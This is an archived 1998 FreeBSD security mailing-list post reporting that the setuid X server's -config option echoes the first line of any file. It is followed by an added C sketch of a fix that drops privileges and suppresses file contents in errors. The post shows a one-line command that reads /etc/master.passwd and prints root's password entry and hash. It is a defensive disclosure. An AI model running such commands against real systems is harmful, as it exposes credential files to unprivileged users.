From owner-freebsd-security Thu Oct 15 22:08:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA11231 for freebsd-security-outgoing; Thu, 15 Oct 1998 22:08:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from aniwa.sky (aniwa.actrix.gen.nz [203.96.56.186]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA11202 for ; Thu, 15 Oct 1998 22:08:32 -0700 (PDT) (envelope-from andrew@squiz.co.nz)
Received: from localhost (andrew@localhost) by aniwa.sky (8.8.8/8.8.7) with SMTP id SAA04675 for ; Fri, 16 Oct 1998 18:08:03 +1300 (NZDT) (envelope-from andrew@squiz.co.nz)
Date: Fri, 16 Oct 1998 18:08:02 +1300 (NZDT)
From: Andrew McNaughton
X-Sender: andrew@aniwa.sky
Reply-To: andrew@squiz.co.nz
To: security@FreeBSD.ORG
Subject: X allows ordinary user to read first line of any file
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Found this on http://www.hoobie.net/security/exploits/

    joeuser@host$ X -config /etc/master.passwd
    Unrecognized option: root:yd0Rj.v.r1wKA:0:0::0:0:Charlie
    use: X [:] [option]
    . . .

I'm sure there are other files where this can be a problem, but in the case of the password file it seems wise to have a dummy entry as the first line of the master.passwd file.

Andrew McNaughton

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
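
The leak reported above depends on two things: a setuid program opens a user-named file with root's credentials, and its error message echoes what it read. The C sketch below is an added example, not code from the X server or from the original post. It opens the file with the invoking user's ids in effect and reports only the file name and line number; open_as_caller, check_config and the "Section" keyword test are hypothetical stand-ins for a real option parser.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Open path with the caller's real uid/gid in effect, then restore the
 * privileged ids. Returns an fd, or -1 on any failure (fails closed). */
int open_as_caller(const char *path)
{
    uid_t euid = geteuid();
    gid_t egid = getegid();
    int fd;

    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_RDONLY | O_CLOEXEC);
    if (seteuid(euid) != 0 || setegid(egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    return fd;
}

/* Hypothetical option check: returns 0 if the first line of the file
 * starts with the keyword "Section", -1 otherwise. On error, msg (n > 0)
 * names the file and line only; the unrecognized text itself is never
 * copied into it, so nothing read from the file reaches the terminal. */
int check_config(const char *path, char *msg, size_t n)
{
    char line[256];
    int fd = open_as_caller(path);
    FILE *fp = fd >= 0 ? fdopen(fd, "r") : NULL;
    int ok;

    if (fp == NULL) {
        if (fd >= 0)
            close(fd);
        snprintf(msg, n, "%s: cannot open as invoking user", path);
        return -1;
    }
    ok = fgets(line, sizeof line, fp) != NULL && strncmp(line, "Section", 7) == 0;
    fclose(fp);
    snprintf(msg, n, "%s%s", ok ? "" : path, ok ? "" : ": unrecognized option on line 1");
    return ok ? 0 : -1;
}
```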